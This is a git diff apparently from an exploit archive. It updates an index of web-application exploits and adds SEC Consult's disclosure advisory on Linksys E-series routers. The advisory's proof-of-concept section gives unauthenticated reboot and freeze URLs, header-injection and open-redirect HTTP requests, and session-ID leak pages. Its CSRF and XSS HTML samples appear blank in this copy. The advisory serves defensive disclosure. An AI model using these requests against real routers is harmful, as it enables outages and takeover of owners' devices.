-42606,platforms/php/webapps/42606.txt,"Joomla! Component Survey Force Deluxe 3.2.4 - 'invite' Parameter SQL Injection",2017-09-03,"Ihsan Sencan",php,webapps,0 +42606,platforms/php/webapps/42606.txt,"Joomla! Component Survey Force Deluxe 3.2.4 - 'invite' SQL Injection",2017-09-03,"Ihsan Sencan",php,webapps,0 42607,platforms/php/webapps/42607.txt,"Joomla! Component CheckList 1.1.0 - SQL Injection",2017-09-03,"Ihsan Sencan",php,webapps,0 42608,platforms/hardware/webapps/42608.txt,"Wireless Repeater BE126 - Remote Code Execution",2017-09-04,"Hay Mizrachi",hardware,webapps,0 42610,platforms/multiple/webapps/42610.txt,"CodeMeter 6.50 - Cross-Site Scripting",2017-09-04,Vulnerability-Lab,multiple,webapps,0 @@ -38548,12 +38549,12 @@ id,file,description,date,author,platform,type,port 42617,platforms/php/webapps/42617.txt,"iGreeting Cards 1.0 - SQL Injection",2017-09-04,"Ihsan Sencan",php,webapps,0 42618,platforms/php/webapps/42618.txt,"WordPress Plugin Participants Database < 1.7.5.10 - Cross-Site Scripting",2017-09-01,"Benjamin Lim",php,webapps,0 42619,platforms/php/webapps/42619.txt,"The Car Project 1.0 - SQL Injection",2017-09-05,"Ihsan Sencan",php,webapps,0 -42620,platforms/php/webapps/42620.txt,"Cory Support - 'pr' Parameter SQL Injection",2017-09-06,v3n0m,php,webapps,0 +42620,platforms/php/webapps/42620.txt,"Cory Support - 'pr' SQL Injection",2017-09-06,v3n0m,php,webapps,0 42622,platforms/php/webapps/42622.html,"Pay Banner Text Link Ad 1.0.6.1 - Cross-Site Request Forgery (Update Admin)",2017-09-06,"Ihsan Sencan",php,webapps,0 42623,platforms/php/webapps/42623.txt,"Pay Banner Text Link Ad 1.0.6.1 - SQL Injection",2017-09-06,"Ihsan Sencan",php,webapps,0 42628,platforms/php/webapps/42628.txt,"Ultimate HR System < 1.2 - Directory Traversal / Cross-Site Scripting",2017-09-05,8bitsec,php,webapps,0 42629,platforms/php/webapps/42629.txt,"Online Invoice System 3.0 - SQL Injection",2017-09-07,"Ihsan Sencan",php,webapps,0 -42631,platforms/php/webapps/42631.txt,"EzBan 5.3 - 'id' Parameter SQL Injection",2017-09-07,"Ihsan Sencan",php,webapps,0 +42631,platforms/php/webapps/42631.txt,"EzBan 5.3 - 'id' SQL Injection",2017-09-07,"Ihsan Sencan",php,webapps,0 42632,platforms/php/webapps/42632.txt,"EzInvoice 6.02 - SQL Injection",2017-09-07,"Ihsan Sencan",php,webapps,0 42633,platforms/hardware/webapps/42633.txt,"Roteador Wireless Intelbras WRN150 - Cross-Site Scripting",2017-09-07,"Elber Tavares",hardware,webapps,0 42634,platforms/hardware/webapps/42634.txt,"Huawei HG255s - Directory Traversal",2017-09-07,"Ahmet Mersin",hardware,webapps,0 @@ -38581,26 +38582,26 @@ id,file,description,date,author,platform,type,port 42662,platforms/php/webapps/42662.txt,"Gr8 Multiple Search Engine Script 1.0 - SQL Injection",2017-09-12,"Ihsan Sencan",php,webapps,0 42663,platforms/php/webapps/42663.txt,"inClick Cloud Server 5.0 - SQL Injection",2017-09-12,"Ihsan Sencan",php,webapps,0 42667,platforms/php/webapps/42667.txt,"ICLowBidAuction 3.3 - SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0 -42668,platforms/php/webapps/42668.txt,"ICMLM 2.1 - 'key' Parameter SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0 -42669,platforms/php/webapps/42669.txt,"ICHotelReservation 3.3 - 'key' Parameter SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0 -42670,platforms/php/webapps/42670.txt,"ICAuction 2.2 - 'id' Parameter SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0 -42671,platforms/php/webapps/42671.txt,"ICDoctor Appointment 1.3 - 'key' Parameter SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0 -42672,platforms/php/webapps/42672.txt,"ICRestaurant software 1.4 - 'key' Parameter SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0 +42668,platforms/php/webapps/42668.txt,"ICMLM 2.1 - 'key' SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0 +42669,platforms/php/webapps/42669.txt,"ICHotelReservation 3.3 - 'key' SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0 +42670,platforms/php/webapps/42670.txt,"ICAuction 2.2 - 'id' SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0 +42671,platforms/php/webapps/42671.txt,"ICDoctor Appointment 1.3 - 'key' SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0 +42672,platforms/php/webapps/42672.txt,"ICRestaurant software 1.4 - 'key' SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0 42673,platforms/php/webapps/42673.txt,"ICDutchAuction 1.2 - SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0 42674,platforms/php/webapps/42674.txt,"ICAutosales 2.2 - SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0 42675,platforms/php/webapps/42675.txt,"ICTraveling 2.2 - Authentication Bypass",2017-09-13,"Ihsan Sencan",php,webapps,0 -42677,platforms/php/webapps/42677.txt,"ICStudents 1.2 - 'key' Parameter SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0 +42677,platforms/php/webapps/42677.txt,"ICStudents 1.2 - 'key' SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0 42676,platforms/php/webapps/42676.txt,"ICClassifieds 1.1 - SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0 42678,platforms/php/webapps/42678.txt,"ICSurvey 1.1 - SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0 -42679,platforms/php/webapps/42679.txt,"ICJewelry 1.1 - 'key' Parameter SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0 -42680,platforms/php/webapps/42680.txt,"IC-T-Shirt 1.2 - 'key' Parameter SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0 -42681,platforms/php/webapps/42681.txt,"ICProductConfigurator 1.1 - 'key' Parameter SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0 -42682,platforms/php/webapps/42682.txt,"ICGrocery 1.1 - 'key' Parameter SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0 -42684,platforms/php/webapps/42684.txt,"ICCallLimousine 1.1 - 'key' Parameter SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0 +42679,platforms/php/webapps/42679.txt,"ICJewelry 1.1 - 'key' SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0 +42680,platforms/php/webapps/42680.txt,"IC-T-Shirt 1.2 - 'key' SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0 +42681,platforms/php/webapps/42681.txt,"ICProductConfigurator 1.1 - 'key' SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0 +42682,platforms/php/webapps/42682.txt,"ICGrocery 1.1 - 'key' SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0 +42684,platforms/php/webapps/42684.txt,"ICCallLimousine 1.1 - 'key' SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0 42685,platforms/php/webapps/42685.txt,"ICProjectBidding 1.1 - SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0 -42686,platforms/php/webapps/42686.txt,"ICDental Clinic 1.2 - 'key' Parameter SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0 -42687,platforms/aspx/webapps/42687.txt,"ICEstate 1.1 - 'id' Parameter SQL Injection",2017-09-13,"Ihsan Sencan",aspx,webapps,0 -42688,platforms/php/webapps/42688.txt,"ICHelpDesk 1.1 - 'pk' Parameter SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0 +42686,platforms/php/webapps/42686.txt,"ICDental Clinic 1.2 - 'key' SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0 +42687,platforms/aspx/webapps/42687.txt,"ICEstate 1.1 - 'id' SQL Injection",2017-09-13,"Ihsan Sencan",aspx,webapps,0 +42688,platforms/php/webapps/42688.txt,"ICHelpDesk 1.1 - 'pk' SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0 42689,platforms/php/webapps/42689.txt,"ICSiteBuilder 1.1 - SQL Injection",2017-09-13,"Ihsan Sencan",php,webapps,0 42690,platforms/asp/webapps/42690.txt,"ICAffiliateTracking 1.1 - Authentication Bypass",2017-09-13,"Ihsan Sencan",asp,webapps,0 42699,platforms/windows/webapps/42699.rb,"Indusoft Web Studio - Directory Traversal Information Disclosure (Metasploit)",2017-09-13,"James Fitts",windows,webapps,0 @@ -38609,9 +38610,9 @@ id,file,description,date,author,platform,type,port 42707,platforms/windows/webapps/42707.txt,"Carel PlantVisor 2.4.4 - Directory Traversal",2011-09-13,"Luigi Auriemma",windows,webapps,0 42713,platforms/php/webapps/42713.txt,"Enterprise Edition Payment Processor Script 3.7 - SQL Injection",2017-09-14,"Ihsan Sencan",php,webapps,0 42714,platforms/php/webapps/42714.txt,"Adserver Script 5.6 - SQL Injection",2017-09-14,"Ihsan Sencan",php,webapps,0 -42715,platforms/php/webapps/42715.txt,"PTC KSV1 Script 1.7 - 'type' Parameter SQL Injection",2017-09-14,"Ihsan Sencan",php,webapps,0 +42715,platforms/php/webapps/42715.txt,"PTC KSV1 Script 1.7 - 'type' SQL Injection",2017-09-14,"Ihsan Sencan",php,webapps,0 42716,platforms/php/webapps/42716.txt,"Theater Management Script - SQL Injection",2017-09-14,"Ihsan Sencan",php,webapps,0 -42717,platforms/php/webapps/42717.txt,"Justdial Clone Script - 'fid' Parameter SQL Injection",2017-09-14,"Ihsan Sencan",php,webapps,0 +42717,platforms/php/webapps/42717.txt,"Justdial Clone Script - 'fid' SQL Injection",2017-09-14,"Ihsan Sencan",php,webapps,0 42727,platforms/php/webapps/42727.txt,"XYZ Auto Classifieds 1.0 - SQL Injection",2017-09-12,8bitsec,php,webapps,0 42728,platforms/php/webapps/42728.txt,"Consumer Review Script 1.0 - SQL Injection",2017-09-12,8bitsec,php,webapps,0 42729,platforms/hardware/webapps/42729.py,"D-Link DIR8xx Routers - Leak Credentials",2017-09-12,embedi,hardware,webapps,0 @@ -38619,7 +38620,7 @@ id,file,description,date,author,platform,type,port 42731,platforms/hardware/webapps/42731.sh,"D-Link DIR8xx Routers - Local Firmware Upload",2017-09-12,embedi,hardware,webapps,0 42732,platforms/hardware/webapps/42732.py,"Humax Wi-Fi Router HG100R 2.0.6 - Authentication Bypass",2017-09-14,Kivson,hardware,webapps,0 42733,platforms/php/webapps/42733.txt,"PTCEvolution 5.50 - SQL Injection",2017-09-15,"Ihsan Sencan",php,webapps,0 -42734,platforms/php/webapps/42734.txt,"Contact Manager 1.0 - 'femail' Parameter SQL Injection",2017-09-15,"Ihsan Sencan",php,webapps,0 +42734,platforms/php/webapps/42734.txt,"Contact Manager 1.0 - 'femail' SQL Injection",2017-09-15,"Ihsan Sencan",php,webapps,0 42736,platforms/asp/webapps/42736.py,"Digirez 3.4 - Cross-Site Request Forgery (Update Admin)",2017-09-18,"Ihsan Sencan",asp,webapps,0 42737,platforms/asp/webapps/42737.py,"Digileave 1.2 - Cross-Site Request Forgery (Update Admin)",2017-09-18,"Ihsan Sencan",asp,webapps,0 42738,platforms/asp/webapps/42738.py,"DigiAffiliate 1.4 - Cross-Site Request Forgery (Update Admin)",2017-09-18,"Ihsan Sencan",asp,webapps,0 @@ -38627,17 +38628,17 @@ id,file,description,date,author,platform,type,port 42740,platforms/hardware/webapps/42740.txt,"iBall ADSL2+ Home Router - Authentication Bypass",2017-09-18,"Gem George",hardware,webapps,0 42745,platforms/linux/webapps/42745.py,"Apache < 2.2.34 / < 2.4.27 - OPTIONS Memory Leak",2017-09-18,"Hanno Bock",linux,webapps,0 42751,platforms/php/webapps/42751.txt,"Foodspotting Clone 1.0 - SQL Injection",2017-09-13,8bitsec,php,webapps,0 -42752,platforms/php/webapps/42752.txt,"iTech Gigs Script 1.20 - 'cat' Parameter SQL Injection",2017-09-15,8bitsec,php,webapps,0 +42752,platforms/php/webapps/42752.txt,"iTech Gigs Script 1.20 - 'cat' SQL Injection",2017-09-15,8bitsec,php,webapps,0 42754,platforms/php/webapps/42754.txt,"Tecnovision DLX Spot - Authentication Bypass",2017-05-19,"Simon Brannstrom",php,webapps,0 42755,platforms/php/webapps/42755.txt,"Tecnovision DLX Spot - Arbitrary File Upload",2017-05-19,"Simon Brannstrom",php,webapps,0 42761,platforms/php/webapps/42761.txt,"PHPMyFAQ 2.9.8 - Cross-Site Scripting",2017-09-21,"Ishaq Mohammed",php,webapps,0 42768,platforms/php/webapps/42768.pl,"Stock Photo Selling 1.0 - SQL Injection",2017-09-22,"Ihsan Sencan",php,webapps,0 42769,platforms/linux/webapps/42769.rb,"DenyAll WAF < 6.3.0 - Remote Code Execution (Metasploit)",2017-09-19,"Mehmet Ince",linux,webapps,0 -42770,platforms/php/webapps/42770.txt,"Lending And Borrowing - 'pid' Parameter SQL Injection",2017-09-22,"Ihsan Sencan",php,webapps,0 +42770,platforms/php/webapps/42770.txt,"Lending And Borrowing - 'pid' SQL Injection",2017-09-22,"Ihsan Sencan",php,webapps,0 42771,platforms/php/webapps/42771.txt,"Multi Level Marketing - SQL Injection",2017-09-22,"Ihsan Sencan",php,webapps,0 42772,platforms/php/webapps/42772.pl,"Cash Back Comparison Script 1.0 - SQL Injection",2017-09-22,"Ihsan Sencan",php,webapps,0 42773,platforms/php/webapps/42773.txt,"Claydip Airbnb Clone 1.0 - Arbitrary File Upload",2017-09-22,"Ihsan Sencan",php,webapps,0 -42774,platforms/php/webapps/42774.txt,"Secure E-commerce Script 1.02 - 'sid' Parameter SQL Injection",2017-09-22,8bitsec,php,webapps,0 +42774,platforms/php/webapps/42774.txt,"Secure E-commerce Script 1.02 - 'sid' SQL Injection",2017-09-22,8bitsec,php,webapps,0 42775,platforms/php/webapps/42775.txt,"PHP Auction Ecommerce Script 1.6 - SQL Injection",2017-09-22,8bitsec,php,webapps,0 42776,platforms/asp/webapps/42776.txt,"JitBit HelpDesk < 9.0.2 - Authentication Bypass",2017-09-22,Kc57,asp,webapps,0 42785,platforms/hardware/webapps/42785.sh,"FLIR Thermal Camera PT-Series (PT-334 200562) - Root Remote Code Execution",2017-09-25,LiquidWorm,hardware,webapps,0 @@ -38662,12 +38663,12 @@ id,file,description,date,author,platform,type,port 42894,platforms/php/webapps/42894.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - Server Side Request Forgery",2017-09-28,hyp3rlinx,php,webapps,0 42895,platforms/php/webapps/42895.txt,"Trend Micro OfficeScan 11.0/XG (12.0) - 'Host' Header Injection",2017-09-28,hyp3rlinx,php,webapps,0 42916,platforms/hardware/webapps/42916.py,"Roteador Wireless Intelbras WRN150 - Autentication Bypass",2017-09-28,"Elber Tavares",hardware,webapps,0 -42919,platforms/php/webapps/42919.txt,"Easy Blog PHP Script 1.3a - 'id' Parameter SQL Injection",2017-09-28,8bitsec,php,webapps,0 +42919,platforms/php/webapps/42919.txt,"Easy Blog PHP Script 1.3a - 'id' SQL Injection",2017-09-28,8bitsec,php,webapps,0 42922,platforms/php/webapps/42922.py,"FileRun < 2017.09.18 - SQL Injection",2017-09-29,SPARC,php,webapps,0 42923,platforms/aspx/webapps/42923.txt,"SmarterStats 11.3.6347 - Cross-Site Scripting",2017-09-27,sqlhacker,aspx,webapps,0 42924,platforms/php/webapps/42924.txt,"WordPress Plugin WPHRM - SQL Injection",2017-09-29,"Ihsan Sencan",php,webapps,0 -42925,platforms/php/webapps/42925.txt,"PHP Multi Vendor Script 1.02 - 'sid' Parameter SQL Injection",2017-09-28,8bitsec,php,webapps,0 -42926,platforms/php/webapps/42926.txt,"Real Estate MLM plan script 1.0 - 'srch' Parameter SQL Injection",2017-09-28,8bitsec,php,webapps,0 +42925,platforms/php/webapps/42925.txt,"PHP Multi Vendor Script 1.02 - 'sid' SQL Injection",2017-09-28,8bitsec,php,webapps,0 +42926,platforms/php/webapps/42926.txt,"Real Estate MLM plan script 1.0 - 'srch' SQL Injection",2017-09-28,8bitsec,php,webapps,0 42927,platforms/php/webapps/42927.txt,"ConverTo Video Downloader & Converter 1.4.1 - Arbitrary File Download",2017-09-29,"Ihsan Sencan",php,webapps,0 42931,platforms/hardware/webapps/42931.txt,"HBGK DVR 3.0.0 build20161206 - Authentication Bypass",2017-09-24,"RAT - ThiefKing",hardware,webapps,0 42933,platforms/hardware/webapps/42933.txt,"NPM-V (Network Power Manager) 2.4.1 - Password Reset",2017-10-02,"Saeed reza Zamanian",hardware,webapps,0 @@ -38685,14 +38686,15 @@ id,file,description,date,author,platform,type,port 42966,platforms/jsp/webapps/42966.py,"Apache Tomcat < 9.0.1 (Beta) / < 8.5.23 / < 8.0.47 / < 7.0.8 - JSP Upload Bypass / Remote Code Execution",2017-10-09,intx0x80,jsp,webapps,0 42967,platforms/php/webapps/42967.txt,"ClipShare 7.0 - SQL Injection",2017-10-09,8bitsec,php,webapps,0 42968,platforms/php/webapps/42968.txt,"Complain Management System - Hard-Coded Credentials / Blind SQL injection",2017-10-10,havysec,php,webapps,0 +43013,platforms/cgi/webapps/43013.txt,"Linksys E Series - Multiple Vulnerabilities",2017-10-18,"SEC Consult",cgi,webapps,0 42971,platforms/php/webapps/42971.rb,"Trend Micro OfficeScan 11.0/XG (12.0) - Remote Code Execution (Metasploit)",2017-10-11,"Mehmet Ince",php,webapps,0 42972,platforms/php/webapps/42972.rb,"Trend Micro InterScan Messaging Security (Virtual Appliance) - Remote Code Execution (Metasploit)",2017-10-11,"Mehmet Ince",php,webapps,0 42975,platforms/linux/webapps/42975.txt,"Trend Micro Data Loss Prevention Virtual Appliance 5.2 - Path Traversal",2017-10-11,"Leonardo Duarte",linux,webapps,0 42978,platforms/php/webapps/42978.txt,"OctoberCMS 1.0.425 (Build 425) - Cross-Site Scripting",2017-10-12,"Ishaq Mohammed",php,webapps,0 -42979,platforms/php/webapps/42979.txt,"E-Sic Software livre CMS - 'q' Parameter SQL Injection",2017-10-12,"Guilherme Assmann",php,webapps,0 +42979,platforms/php/webapps/42979.txt,"E-Sic Software livre CMS - 'q' SQL Injection",2017-10-12,"Guilherme Assmann",php,webapps,0 42980,platforms/php/webapps/42980.txt,"E-Sic Software livre CMS - Autentication Bypass",2017-10-12,"Elber Tavares",php,webapps,0 -42981,platforms/php/webapps/42981.txt,"E-Sic Software livre CMS - 'cpfcnpj' Parameter SQL Injection",2017-10-12,"Elber Tavares",php,webapps,0 -42982,platforms/php/webapps/42982.txt,"E-Sic Software livre CMS - 'f' Parameter SQL Injection",2017-10-12,"Elber Tavares",php,webapps,0 +42981,platforms/php/webapps/42981.txt,"E-Sic Software livre CMS - 'cpfcnpj' SQL Injection",2017-10-12,"Elber Tavares",php,webapps,0 +42982,platforms/php/webapps/42982.txt,"E-Sic Software livre CMS - 'f' SQL Injection",2017-10-12,"Elber Tavares",php,webapps,0 42983,platforms/php/webapps/42983.txt,"E-Sic Software livre CMS - Cross Site Scripting",2017-10-12,"Elber Tavares",php,webapps,0 42985,platforms/php/webapps/42985.txt,"TYPO3 Extension Restler 1.7.0 - Local File Disclosure",2017-10-13,CrashBandicot,php,webapps,0 42986,platforms/hardware/webapps/42986.txt,"Dreambox Plugin BouquetEditor - Cross-Site Scripting",2017-10-12,"Thiago Sena",hardware,webapps,0 @@ -38705,3 +38707,6 @@ id,file,description,date,author,platform,type,port 43004,platforms/multiple/webapps/43004.py,"OpenText Documentum Content Server - dmr_content Privilege Escalation",2017-10-17,"Andrey B. Panfilov",multiple,webapps,0 43005,platforms/multiple/webapps/43005.py,"OpenText Documentum Content Server - Arbitrary File Download",2017-10-17,"Andrey B. Panfilov",multiple,webapps,0 43009,platforms/xml/webapps/43009.txt,"Apache Solr 7.0.1 - XML External Entity Expansion / Remote Code Execution",2017-10-17,"Michael Stepankin and Olga Barinova",xml,webapps,0 +43011,platforms/php/webapps/43011.txt,"Career Portal 1.0 - SQL Injection",2017-10-17,8bitsec,php,webapps,0 +43012,platforms/php/webapps/43012.txt,"Wordpress Plugin Car Park Booking - SQL Injection",2017-10-17,8bitsec,php,webapps,0 +43015,platforms/php/webapps/43015.txt,"Afian AB FileRun 2017.03.18 - Multiple Vulnerabilities",2017-10-18,"SEC Consult",php,webapps,0 diff --git a/platforms/cgi/webapps/43013.txt b/platforms/cgi/webapps/43013.txt new file mode 100755 index 000000000..83115b320 --- /dev/null +++ b/platforms/cgi/webapps/43013.txt @@ -0,0 +1,435 @@ +SEC Consult Vulnerability Lab Security Advisory < 20171018-1 > +======================================================================= + title: Multiple vulnerabilities + product: Linksys E series, see "Vulnerable / tested versions" + vulnerable version: see "Vulnerable / tested versions" + fixed version: no public fix, see solution/timeline + CVE number: - + impact: high + homepage: http://www.linksys.com/ + found: 2017-06-26 + by: T. Weber (Office Vienna) + SEC Consult Vulnerability Lab + + An integrated part of SEC Consult + Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow + Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich + + https://www.sec-consult.com + +======================================================================= + +Vendor description: +------------------- +"Today, Belkin International has three brands – Belkin, Linksys and WeMo +– to enhance the technology that connects us to the people, activities +and experiences we love. Belkin products are renowned for their +simplicity and ease of use, while our Linksys brand helped make +wireless connectivity mainstream around the globe. Our newest brand, +WeMo, is the leader in delivering customizable smart home experiences. +Its product platform empowers people to monitor, measure and manage +their electronics, appliances and lighting at home and on-the-go." + +Source: http://www.belkin.com/uk/aboutUs/ + + +Business recommendation: +------------------------ +SEC Consult recommends not to use this product in a production environment +until a thorough security review has been performed by security +professionals and all identified issues have been resolved. + + +Vulnerability overview/description: +----------------------------------- +1) Denial of Service (DoS) +A denial of service vulnerability is present in the web server of the +device. This vulnerability is very simple to trigger since a single GET +request to a cgi-script is sufficient. + +A crafted GET request, e.g. triggered by CSRF over a user in the +internal network, can reboot the whole device or freeze the web interface +and the DHCP service. This action does not require authentication. + +2) HTTP Header Injection & Open Redirect +Due to a flaw in the web service a header injection can be triggered +without authentication. This kind of vulnerability can be used to perform +different arbitrary actions. One example in this case is an open redirection +to another web site. In the worst case a session ID of an authenticated user +can be stolen this way because the session ID is embedded into the url +which is another flaw of the web service. + +3) Improper Session-Protection +The session ID for administrative users can be fetched from the device from +LAN without credentials because of insecure session handling. +This vulnerability can only be exploited when an administrator was +authenticated to the device before the attack and opened a session previously. + +The login works if the attacker has the same IP address as the PC +of the legitimate administrator. Therefore, a CSRF attack is possible when +the administrator is lured to surf on a malicious web site or to click on +a malicious link. + +4) Cross-Site Request Forgery Vulnerability in Admin Interface +A cross-site request forgery vulnerability can be triggered in the +administrative interface. This vulnerability can be exploited because the +session ID can be hijacked by using 3) via LAN. An exploitation via internet +is only possible if the session id is exposed to the internet (for example via +the referrer). + +An attacker can change any configuration of the device by luring a user to +click on a malicious link or surf to a malicious web-site. + +5) Cross-Site Scripting Vulnerability in Admin Interface +A cross-site scripting vulnerability can be triggered in the administrative +interface. This vulnerability can be exploited because the session ID can +be hijacked by using 3) via LAN. An exploitation via internet is only possible +if the session id is exposed to the internet (for example via the referrer). + +By using this vulnerability, malicious code can be executed in the context of +the browser session of the attacked user. + + +Proof of concept: +----------------- +1) Denial of Service + +Unauthenticated request for triggering a router reboot in browser: +http:///upgrade.cgi +http:///restore.cgi + +Unauthenticated request for triggering a router freeze in browser: +http:///mfgtst.cgi + + +2) HTTP Header Injection & Open Redirect + +A header injection can be triggered by the following unauthenticated request: + +Request: +------------------------------------------------------------------------------ +POST /UnsecuredEnable.cgi HTTP/1.1 +Host: +Accept: */* +Accept-Language: en +Connection: close +Referer: http:///Unsecured.cgi +Content-Type: application/x-www-form-urlencoded +Content-Length: 97 + +submit_type=&submit_button=UnsecuredEnable&gui_action=Apply&wait_time=19&next_url=INJEC%0d%0aTION&change_action= +------------------------------------------------------------------------------ + +Response: +------------------------------------------------------------------------------ +HTTP/1.1 302 Redirect +Server: httpd +Date: Thu, 01 Jan 1970 00:27:41 GMT +Location: http://INJEC +TION +Content-Type: text/plain +Connection: close +------------------------------------------------------------------------------ + +Setting a new location will result in an open redirect: + +Request: +------------------------------------------------------------------------------ +POST /UnsecuredEnable.cgi HTTP/1.1 +Host: +Accept: */* +Accept-Language: en +Connection: close +Content-Type: application/x-www-form-urlencoded +Content-Length: 97 + +submit_type=&submit_button=UnsecuredEnable&gui_action=Apply&wait_time=19&next_url=www.sec-consult.com&change_action= +------------------------------------------------------------------------------ +Response: +------------------------------------------------------------------------------ +HTTP/1.1 302 Redirect +Server: httpd +Date: Thu, 01 Jan 1970 00:27:57 GMT +Location: http://www.sec-consult.com +Content-Type: text/plain +Connection: close +------------------------------------------------------------------------------ + +3) Improper Session-Protection +These two requests can be used to fetch the current session ID of an authenticated +user. + +http:///BlockTime.asp +http:///BlockSite.asp + +The response is nearly the same (except the "inetblock" and "blocksite" +functions): +------------------------------------------------------------------------------- +HTTP/1.1 200 Ok +Server: httpd +Date: Thu, 01 Jan 1970 00:04:32 GMT +Cache-Control: no-cache +Pragma: no-cache +Expires: 0 +Content-Type: text/html + +[...] + +function init() +{ + var close_session = "0"; + if ( close_session == "1" ) + { + document.forms[0].action= "hndUnblock.cgi"; + } + else + { + document.forms[0].action= "hndUnblock.cgi?session_id="; + } + +} + + + + +
+
+

+ +

+
+ +[...] + + + +------------------------------------------------------------------------------- + +4) Cross-Site Request Forgery Vulnerability in Admin Interface +The following proof of concept HTML code can change the router password by +exploiting CSRF after replacing the with the fetched one from 3). + +The new password is "secconsult". +------------------------------------------------------------------------------- + + + +
+ + + + + + + + + + + + + + + + + + + + +
+ + +------------------------------------------------------------------------------- + + +5) Cross-Site Scripting Vulnerability in Admin Interface +The must be replaced again. The "apply.cgi" script can be abused +to trigger the cross-site scripting vulnerability. + +------------------------------------------------------------------------------- + + + +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + +------------------------------------------------------------------------------- + + +Vulnerable / tested versions: +----------------------------- +Linksys E2500 - 3.0.02 (build 2) + +According to the Linksys security contact the following products are +affected too: +Linksys E900 (Version: 1.0.06) +Linksys E1200 (Version: 2.0.07 Build 5) +Linksys E8400 AC2400 Dual-Band Wi-Fi Router (Version: basic version ?) + + +Based on information embedded in the firmware of other Linksys products +gathered from our IoT Inspector tool we believe the following devices +are affected as well: + +Linksys E900 (Version: 1.0.06) -- confirmed by vendor +Linksys E900-ME (Version: 1.0.06) +Linksys E1200 (Version: 2.0.07 Build 5) -- confirmed by vendor +Linksys E1500 (Version: 1.0.06 Build 1) +Linksys E3200 (Version: 1.0.05 Build 2) +Linksys E4200 (Version: 1.0.06 Build 3) +Linksys WRT54G2 (Version: 1.5.02 Build 5) + + +Vendor contact timeline: +------------------------ +2017-07-10: Contacting vendor through security@linksys.com. Set release date + to 2017-08-29. +2017-07-12: Confirmation of recipient. The contact also states that + the unit is older and they have to look for it. +2017-08-07: Asking for update; Contact responds that they have to look for + such a unit in their inventory. +2017-08-08: Contact responds that he verified three of four vulnerabilities. +2017-08-09: Sent PCAP dump and more information about vulnerability #4 to + assist the contact with verification. +2017-08-18: Sending new advisory version to contact and asking for an update; + No answer. +2017-08-22: Asking for an update; Contact states that he is trying to get a + fixed firmware from the OEM. +2017-08-24: Asked the vendor how much additional time he will need. +2017-08-25: Vendor states that it is difficult to get an update from the OEM + due to the age of the product ("Many of the engineers who + originally worked on this code base are no longer with the + company"). Clarified some CORS/SOP issues which were + misunderstood. +2017-08-30: Sending Proof of Concept for CSRF/XSS as HTML files to the vendor. + Changed the vulnerability description of the advisory to + explain the possibility of exploiting the CSRF/XSS vulnerabilities + from LAN and WAN side. +2017-09-07: Asking for an update; Vendor agrees with the new vulnerability + descriptions and states that the OEM got back to them with a fix + for the E2500 and they are in the QA phase. The vendor is expecting + fixes for E900, E1200, and E8400 later this week or next week to + hand them over to QA. +2017-09-07: Stated that E8400 was not found by the IoT Inspector because there + was no firmware available to download online. Stated that it will + be available in the next version of the advisory. Shifting the + advisory release to 2017-09-26. + Asking for confirmation of the other reported devices: + Linksys E900-ME (Version: 1.0.06) + Linksys E1500 (Version: 1.0.06 Build 1) + Linksys E3200 (Version: 1.0.05 Build 2) + Linksys E4200 (Version: 1.0.06 Build 3) + Linksys WRT54G2 (Version: 1.5.02 Build 5) + No answer. +2017-09-18: Sending new version of the advisory to the vendor. Asking for an + update; No answer. +2017-09-21: Asking for an update; No answer. +2017-09-26: Asking for an update; No answer. +2017-10-02: Asking for an update and shifting the advisory release to + 2017-10-09; No answer. +2017-10-16: Informing the vendor that the advisory will be released on + 2017-10-18 because vendor is unresponsive. +2017-10-18: Public release of security advisory + + +Solution: +--------- +Upgrade to new firmware version as soon as the vendor publishes it. + + +Workaround: +----------- +Restrict network access to the device. + + +Advisory URL: +------------- +https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +SEC Consult Vulnerability Lab + +SEC Consult +Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow +Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich + +About SEC Consult Vulnerability Lab +The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It +ensures the continued knowledge gain of SEC Consult in the field of network +and application security to stay ahead of the attacker. The SEC Consult +Vulnerability Lab supports high-quality penetration testing and the evaluation +of new offensive and defensive technologies for our customers. Hence our +customers obtain the most current information about vulnerabilities and valid +recommendation about the risk profile of new technologies. + 